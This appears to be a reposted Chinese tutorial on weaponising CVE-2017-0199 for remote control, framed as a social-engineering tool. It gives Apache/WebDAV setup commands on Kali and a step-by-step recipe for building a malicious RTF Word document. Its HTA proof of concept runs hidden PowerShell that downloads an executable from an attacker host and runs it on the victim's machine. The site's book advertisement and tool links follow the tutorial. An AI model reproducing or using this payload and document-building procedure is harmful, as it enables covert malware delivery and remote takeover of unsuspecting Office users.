CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

栏目: 服务器 · Apache · 发布时间: 8年前

内容简介:CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1:poc

POC的内容:

<script>
poc=new ActiveXObject("WScript.Shell");
poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://ip_url/Atask.exe\', \'c:/windows/temp/Atask.exe\'); c:/windows/temp/Atask.exe', 0);window.close();
</script>

2:word 文档

随意 例如: a.docx

一:KaLi  开启DAV

a2enmod dav 
a2enmod dav_fs 
a2enmod dav_lock 
a2enmod headers

service apache2 restart

二:Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件
保存成 rtf文件 (b.rtf)

四:Kali服务器上 删除 /var/www/html/a.rtf 文件,把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容:

<Directory /> 
Dav on 
</Directory>

<Directory /var/www/html/ms/> 
Header set Content-Type "application/hta" 
</Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到:
`\object\objautlink\rsltpict`

替换为
`\object\objautlink\objupdate\rsltpict`:

保存。。。制作完成


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

剑指Offer:名企面试官精讲典型编程题(第2版)

剑指Offer:名企面试官精讲典型编程题(第2版)

何海涛 / 电子工业出版社 / 2017-5 / 65.00

《剑指Offer:名企面试官精讲典型编程题(第2版)》剖析了80个典型的编程面试题,系统整理基础知识、代码质量、解题思路、优化效率和综合能力这5个面试要点。《剑指Offer:名企面试官精讲典型编程题(第2版)》共分7章,主要包括面试的流程,讨论面试每一环节需要注意的问题;面试需要的基础知识,从编程语言、数据结构及算法三方面总结程序员面试知识点;高质量的代码,讨论影响代码质量的3个要素(规范性、完整......一起来看看 《剑指Offer:名企面试官精讲典型编程题(第2版)》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

URL 编码/解码
URL 编码/解码

URL 编码/解码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器